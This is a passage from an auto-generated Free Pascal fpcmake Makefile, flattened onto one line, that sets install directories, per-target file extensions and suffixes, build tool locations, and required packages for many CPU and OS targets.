INSTALL_SOURCEDIR:=$(INSTALL_PREFIX)/$(SRCPREFIXDIR)/fpc-$(FPC_VERSION)/$(PACKAGE_NAME) endif else INSTALL_SOURCEDIR:=$(INSTALL_PREFIX)/$(SRCPREFIXDIR)/$(PACKAGE_NAME)-$(PACKAGE_VERSION) endif else ifdef INSTALL_FPCPACKAGE ifdef INSTALL_FPCSUBDIR INSTALL_SOURCEDIR:=$(INSTALL_BASEDIR)/source/$(INSTALL_FPCSUBDIR)/$(PACKAGE_NAME) else INSTALL_SOURCEDIR:=$(INSTALL_BASEDIR)/source/$(PACKAGE_NAME) endif else INSTALL_SOURCEDIR:=$(INSTALL_BASEDIR)/source endif endif endif ifndef INSTALL_DOCDIR ifdef UNIXHier ifdef BSDhier DOCPREFIXDIR=share/doc else ifdef linuxHier DOCPREFIXDIR=share/doc else DOCPREFIXDIR=doc endif endif ifdef INSTALL_FPCPACKAGE INSTALL_DOCDIR:=$(INSTALL_PREFIX)/$(DOCPREFIXDIR)/fpc-$(FPC_VERSION)/$(PACKAGE_NAME) else INSTALL_DOCDIR:=$(INSTALL_PREFIX)/$(DOCPREFIXDIR)/$(PACKAGE_NAME)-$(PACKAGE_VERSION) endif else ifdef INSTALL_FPCPACKAGE INSTALL_DOCDIR:=$(INSTALL_BASEDIR)/doc/$(PACKAGE_NAME) else INSTALL_DOCDIR:=$(INSTALL_BASEDIR)/doc endif endif endif ifndef INSTALL_EXAMPLEDIR ifdef UNIXHier ifdef INSTALL_FPCPACKAGE ifdef BSDhier INSTALL_EXAMPLEDIR:=$(INSTALL_PREFIX)/share/examples/fpc-$(FPC_VERSION)/$(PACKAGE_NAME) else ifdef linuxHier INSTALL_EXAMPLEDIR:=$(INSTALL_DOCDIR)/examples else 
INSTALL_EXAMPLEDIR:=$(INSTALL_PREFIX)/doc/fpc-$(FPC_VERSION)/examples/$(PACKAGE_NAME) endif endif else ifdef BSDhier INSTALL_EXAMPLEDIR:=$(INSTALL_PREFIX)/share/examples/$(PACKAGE_NAME)-$(PACKAGE_VERSION) else ifdef linuxHier INSTALL_EXAMPLEDIR:=$(INSTALL_DOCDIR)/examples/$(PACKAGE_NAME)-$(PACKAGE_VERSION) else INSTALL_EXAMPLEDIR:=$(INSTALL_PREFIX)/doc/$(PACKAGE_NAME)-$(PACKAGE_VERSION) endif endif endif else ifdef INSTALL_FPCPACKAGE INSTALL_EXAMPLEDIR:=$(INSTALL_BASEDIR)/examples/$(PACKAGE_NAME) else INSTALL_EXAMPLEDIR:=$(INSTALL_BASEDIR)/examples endif endif endif ifndef INSTALL_DATADIR INSTALL_DATADIR=$(INSTALL_BASEDIR) endif ifndef INSTALL_SHAREDDIR INSTALL_SHAREDDIR=$(INSTALL_PREFIX)/lib endif ifdef CROSSCOMPILE ifndef CROSSBINDIR CROSSBINDIR:=$(wildcard $(CROSSTARGETDIR)/bin/$(SOURCESUFFIX)) ifeq ($(CROSSBINDIR),) CROSSBINDIR:=$(wildcard $(INSTALL_BASEDIR)/cross/$(TARGETSUFFIX)/bin/$(FULL_SOURCE)) endif endif else CROSSBINDIR= endif ifeq ($(OS_SOURCE),linux) ifndef GCCLIBDIR ifeq ($(CPU_TARGET),i386) ifneq ($(findstring x86_64,$(shell uname -a)),) ifeq ($(BINUTILSPREFIX),) GCCLIBDIR:=$(shell dirname `gcc -m32 -print-libgcc-file-name`) else CROSSGCCOPT=-m32 endif endif endif ifeq ($(CPU_TARGET),powerpc) ifeq ($(BINUTILSPREFIX),) GCCLIBDIR:=$(shell dirname `gcc -m32 -print-libgcc-file-name`) else CROSSGCCOPT=-m32 endif endif ifeq ($(CPU_TARGET),powerpc64) ifeq ($(BINUTILSPREFIX),) GCCLIBDIR:=$(shell dirname `gcc -m64 -print-libgcc-file-name`) else CROSSGCCOPT=-m64 endif endif ifeq ($(CPU_TARGET),sparc) ifneq ($(findstring sparc64,$(shell uname -a)),) ifeq ($(BINUTILSPREFIX),) GCCLIBDIR:=$(shell dirname `gcc -m32 -print-libgcc-file-name`) else CROSSGCCOPT=-m32 endif endif endif endif ifdef FPCFPMAKE FPCFPMAKE_CPU_TARGET=$(shell $(FPCFPMAKE) -iTP) ifeq ($(CPU_TARGET),$(FPCFPMAKE_CPU_TARGET)) FPCMAKEGCCLIBDIR:=$(GCCLIBDIR) endif endif ifndef FPCMAKEGCCLIBDIR FPCMAKEGCCLIBDIR:=$(shell dirname `gcc -print-libgcc-file-name`) endif ifndef GCCLIBDIR CROSSGCC=$(strip $(wildcard $(addsuffix /$(BINUTILSPREFIX)gcc$(SRCEXEEXT),$(SEARCHPATH)))) ifneq ($(CROSSGCC),) GCCLIBDIR:=$(shell dirname `$(CROSSGCC) $(CROSSGCCOPT) -print-libgcc-file-name`) endif endif endif ifdef inUnix ifeq ($(OS_SOURCE),netbsd) OTHERLIBDIR:=/usr/pkg/lib endif export GCCLIBDIR FPCMAKEGCCLIBDIR OTHERLIBDIR endif BATCHEXT=.bat LOADEREXT=.as EXEEXT=.exe PPLEXT=.ppl PPUEXT=.ppu OEXT=.o LTOEXT=.bc ASMEXT=.s SMARTEXT=.sl STATICLIBEXT=.a SHAREDLIBEXT=.so SHAREDLIBPREFIX=libfp STATICLIBPREFIX=libp IMPORTLIBPREFIX=libimp RSTEXT=.rst EXEDBGEXT=.dbg ifeq ($(OS_TARGET),go32v1) STATICLIBPREFIX= SHORTSUFFIX=v1 endif ifeq ($(OS_TARGET),go32v2) STATICLIBPREFIX= SHORTSUFFIX=dos IMPORTLIBPREFIX= endif ifeq ($(OS_TARGET),watcom) STATICLIBPREFIX= OEXT=.obj ASMEXT=.asm SHAREDLIBEXT=.dll SHORTSUFFIX=wat IMPORTLIBPREFIX= endif ifneq ($(CPU_TARGET),jvm) ifeq ($(OS_TARGET),android) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=lnx endif endif ifeq ($(OS_TARGET),linux) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=lnx endif ifeq ($(OS_TARGET),dragonfly) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=df endif ifeq ($(OS_TARGET),freebsd) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=fbs endif ifeq ($(OS_TARGET),netbsd) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=nbs endif ifeq ($(OS_TARGET),openbsd) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=obs endif ifeq ($(OS_TARGET),win32) SHAREDLIBEXT=.dll SHORTSUFFIX=w32 endif ifeq ($(OS_TARGET),os2) BATCHEXT=.cmd AOUTEXT=.out STATICLIBPREFIX= SHAREDLIBEXT=.dll SHORTSUFFIX=os2 ECHO=echo 
IMPORTLIBPREFIX= endif ifeq ($(OS_TARGET),emx) BATCHEXT=.cmd AOUTEXT=.out STATICLIBPREFIX= SHAREDLIBEXT=.dll SHORTSUFFIX=emx ECHO=echo IMPORTLIBPREFIX= endif ifeq ($(OS_TARGET),amiga) EXEEXT= SHAREDLIBEXT=.library SHORTSUFFIX=amg endif ifeq ($(OS_TARGET),aros) EXEEXT= SHAREDLIBEXT=.library SHORTSUFFIX=aros endif ifeq ($(OS_TARGET),morphos) EXEEXT= SHAREDLIBEXT=.library SHORTSUFFIX=mos endif ifeq ($(OS_TARGET),atari) EXEEXT=.ttp SHORTSUFFIX=ata endif ifeq ($(OS_TARGET),beos) BATCHEXT=.sh EXEEXT= SHORTSUFFIX=be endif ifeq ($(OS_TARGET),haiku) BATCHEXT=.sh EXEEXT= SHORTSUFFIX=hai endif ifeq ($(OS_TARGET),solaris) BATCHEXT=.sh EXEEXT= SHORTSUFFIX=sun endif ifeq ($(OS_TARGET),qnx) BATCHEXT=.sh EXEEXT= SHORTSUFFIX=qnx endif ifeq ($(OS_TARGET),netware) EXEEXT=.nlm STATICLIBPREFIX= SHORTSUFFIX=nw IMPORTLIBPREFIX=imp endif ifeq ($(OS_TARGET),netwlibc) EXEEXT=.nlm STATICLIBPREFIX= SHORTSUFFIX=nwl IMPORTLIBPREFIX=imp endif ifeq ($(OS_TARGET),macosclassic) BATCHEXT= EXEEXT= DEBUGSYMEXT=.xcoff SHORTSUFFIX=mac IMPORTLIBPREFIX=imp endif ifneq ($(findstring $(OS_TARGET),darwin iphonesim ios),) BATCHEXT=.sh EXEEXT= HASSHAREDLIB=1 SHORTSUFFIX=dwn EXEDBGEXT=.dSYM endif ifeq ($(OS_TARGET),gba) EXEEXT=.gba SHAREDLIBEXT=.so SHORTSUFFIX=gba endif ifeq ($(OS_TARGET),symbian) SHAREDLIBEXT=.dll SHORTSUFFIX=symbian endif ifeq ($(OS_TARGET),NativeNT) SHAREDLIBEXT=.dll SHORTSUFFIX=nativent endif ifeq ($(OS_TARGET),wii) EXEEXT=.dol SHAREDLIBEXT=.so SHORTSUFFIX=wii endif ifeq ($(OS_TARGET),aix) BATCHEXT=.sh EXEEXT= SHAREDLIBEXT=.a SHORTSUFFIX=aix endif ifeq ($(OS_TARGET),java) OEXT=.class ASMEXT=.j SHAREDLIBEXT=.jar SHORTSUFFIX=java endif ifeq ($(CPU_TARGET),jvm) ifeq ($(OS_TARGET),android) OEXT=.class ASMEXT=.j SHAREDLIBEXT=.jar SHORTSUFFIX=android endif endif ifeq ($(OS_TARGET),msdos) STATICLIBPREFIX= STATICLIBEXT=.a SHORTSUFFIX=d16 endif ifeq ($(OS_TARGET),msxdos) STATICLIBPREFIX= STATICLIBEXT=.a SHORTSUFFIX=msd endif ifeq ($(OS_TARGET),embedded) ifeq ($(CPU_TARGET),i8086) STATICLIBPREFIX= STATICLIBEXT=.a else EXEEXT=.bin endif ifeq ($(CPU_TARGET),z80) OEXT=.rel endif SHORTSUFFIX=emb endif ifeq ($(OS_TARGET),win16) STATICLIBPREFIX= STATICLIBEXT=.a SHAREDLIBEXT=.dll SHORTSUFFIX=w16 endif ifeq ($(OS_TARGET),zxspectrum) OEXT=.rel endif ifneq ($(findstring $(OS_SOURCE),$(LIMIT83fs)),) FPCMADE=fpcmade.$(SHORTSUFFIX) ZIPSUFFIX=$(SHORTSUFFIX) ZIPCROSSPREFIX= ZIPSOURCESUFFIX=src ZIPEXAMPLESUFFIX=exm else FPCMADE=fpcmade.$(TARGETSUFFIX) ZIPSOURCESUFFIX=.source ZIPEXAMPLESUFFIX=.examples ifdef CROSSCOMPILE ZIPSUFFIX=.$(SOURCESUFFIX) ZIPCROSSPREFIX=$(TARGETSUFFIX)- else ZIPSUFFIX=.$(TARGETSUFFIX) ZIPCROSSPREFIX= endif endif ifndef ECHO ECHO:=$(strip $(wildcard $(addsuffix /gecho$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ECHO),) ECHO:=$(strip $(wildcard $(addsuffix /echo$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ECHO),) ECHO= __missing_command_ECHO else ECHO:=$(firstword $(ECHO)) endif else ECHO:=$(firstword $(ECHO)) endif endif export ECHO ifndef DATE DATE:=$(strip $(wildcard $(addsuffix /gdate$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(DATE),) DATE:=$(strip $(wildcard $(addsuffix /date$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(DATE),) DATE= __missing_command_DATE else DATE:=$(firstword $(DATE)) endif else DATE:=$(firstword $(DATE)) endif endif export DATE ifndef GINSTALL GINSTALL:=$(strip $(wildcard $(addsuffix /ginstall$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(GINSTALL),) GINSTALL:=$(strip $(wildcard $(addsuffix /install$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(GINSTALL),) GINSTALL= __missing_command_GINSTALL else GINSTALL:=$(firstword $(GINSTALL)) endif 
else GINSTALL:=$(firstword $(GINSTALL)) endif endif export GINSTALL ifndef CPPROG CPPROG:=$(strip $(wildcard $(addsuffix /cp$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(CPPROG),) CPPROG= __missing_command_CPPROG else CPPROG:=$(firstword $(CPPROG)) endif endif export CPPROG ifndef RMPROG RMPROG:=$(strip $(wildcard $(addsuffix /rm$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(RMPROG),) RMPROG= __missing_command_RMPROG else RMPROG:=$(firstword $(RMPROG)) endif endif export RMPROG ifndef MVPROG MVPROG:=$(strip $(wildcard $(addsuffix /mv$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(MVPROG),) MVPROG= __missing_command_MVPROG else MVPROG:=$(firstword $(MVPROG)) endif endif export MVPROG ifndef MKDIRPROG MKDIRPROG:=$(strip $(wildcard $(addsuffix /gmkdir$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(MKDIRPROG),) MKDIRPROG:=$(strip $(wildcard $(addsuffix /mkdir$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(MKDIRPROG),) MKDIRPROG= __missing_command_MKDIRPROG else MKDIRPROG:=$(firstword $(MKDIRPROG)) endif else MKDIRPROG:=$(firstword $(MKDIRPROG)) endif endif export MKDIRPROG ifndef ECHOREDIR ifndef inUnix ECHOREDIR=echo else ECHOREDIR=$(ECHO) endif endif ifndef COPY COPY:=$(CPPROG) -fp endif ifndef COPYTREE COPYTREE:=$(CPPROG) -Rfp endif ifndef MKDIRTREE MKDIRTREE:=$(MKDIRPROG) -p endif ifndef MOVE MOVE:=$(MVPROG) -f endif ifndef DEL DEL:=$(RMPROG) -f endif ifndef DELTREE DELTREE:=$(RMPROG) -rf endif ifndef INSTALL ifdef inUnix INSTALL:=$(GINSTALL) -c -m 644 else INSTALL:=$(COPY) endif endif ifndef INSTALLEXE ifdef inUnix INSTALLEXE:=$(GINSTALL) -c -m 755 else INSTALLEXE:=$(COPY) endif endif ifndef MKDIR MKDIR:=$(GINSTALL) -m 755 -d endif export ECHOREDIR COPY COPYTREE MOVE DEL DELTREE INSTALL INSTALLEXE MKDIR ifndef PPUMOVE PPUMOVE:=$(strip $(wildcard $(addsuffix /ppumove$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(PPUMOVE),) PPUMOVE= __missing_command_PPUMOVE else PPUMOVE:=$(firstword $(PPUMOVE)) endif endif export PPUMOVE ifndef FPCMAKE FPCMAKE:=$(strip $(wildcard $(addsuffix /fpcmake$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(FPCMAKE),) FPCMAKE= __missing_command_FPCMAKE else FPCMAKE:=$(firstword $(FPCMAKE)) endif endif export FPCMAKE ifndef ZIPPROG ZIPPROG:=$(strip $(wildcard $(addsuffix /zip$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ZIPPROG),) ZIPPROG= __missing_command_ZIPPROG else ZIPPROG:=$(firstword $(ZIPPROG)) endif endif export ZIPPROG ifndef TARPROG TARPROG:=$(strip $(wildcard $(addsuffix /gtar$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(TARPROG),) TARPROG:=$(strip $(wildcard $(addsuffix /tar$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(TARPROG),) TARPROG= __missing_command_TARPROG else TARPROG:=$(firstword $(TARPROG)) endif else TARPROG:=$(firstword $(TARPROG)) endif endif export TARPROG ASNAME=$(BINUTILSPREFIX)as LDNAME=$(BINUTILSPREFIX)ld ARNAME=$(BINUTILSPREFIX)ar RCNAME=$(BINUTILSPREFIX)rc NASMNAME=$(BINUTILSPREFIX)nasm ifndef ASPROG ifdef CROSSBINDIR ASPROG=$(CROSSBINDIR)/$(ASNAME)$(SRCEXEEXT) else ASPROG=$(ASNAME) endif endif ifndef LDPROG ifdef CROSSBINDIR LDPROG=$(CROSSBINDIR)/$(LDNAME)$(SRCEXEEXT) else LDPROG=$(LDNAME) endif endif ifndef RCPROG ifdef CROSSBINDIR RCPROG=$(CROSSBINDIR)/$(RCNAME)$(SRCEXEEXT) else RCPROG=$(RCNAME) endif endif ifndef ARPROG ifdef CROSSBINDIR ARPROG=$(CROSSBINDIR)/$(ARNAME)$(SRCEXEEXT) else ARPROG=$(ARNAME) endif endif ifndef NASMPROG ifdef CROSSBINDIR NASMPROG=$(CROSSBINDIR)/$(NASMNAME)$(SRCEXEEXT) else NASMPROG=$(NASMNAME) endif endif AS=$(ASPROG) LD=$(LDPROG) RC=$(RCPROG) AR=$(ARPROG) NASM=$(NASMPROG) ifdef inUnix PPAS=./ppas$(SRCBATCHEXT) else PPAS=ppas$(SRCBATCHEXT) endif ifdef inUnix LDCONFIG=ldconfig else LDCONFIG= 
endif ifdef DATE DATESTR:=$(shell $(DATE) +%Y%m%d) else DATESTR= endif ZIPOPT=-9 ZIPEXT=.zip ifeq ($(USETAR),bz2) TAROPT=vj TAREXT=.tar.bz2 else TAROPT=vz TAREXT=.tar.gz endif override REQUIRE_PACKAGES=rtl fpmkunit ifeq ($(FULL_TARGET),i386-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-go32v2) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-win32) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-os2) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-freebsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-beos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-haiku) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-solaris) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-netware) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-openbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-wdosx) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-darwin) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-emx) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-watcom) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-netwlibc) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-wince) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 
REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-symbian) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-nativent) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-iphonesim) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i386-aros) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-amiga) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-atari) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-palmos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-macosclassic) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),m68k-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-amiga) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-macosclassic) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-darwin) REQUIRE_PACKAGES_RTL=1 
REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-morphos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-wii) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc-aix) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 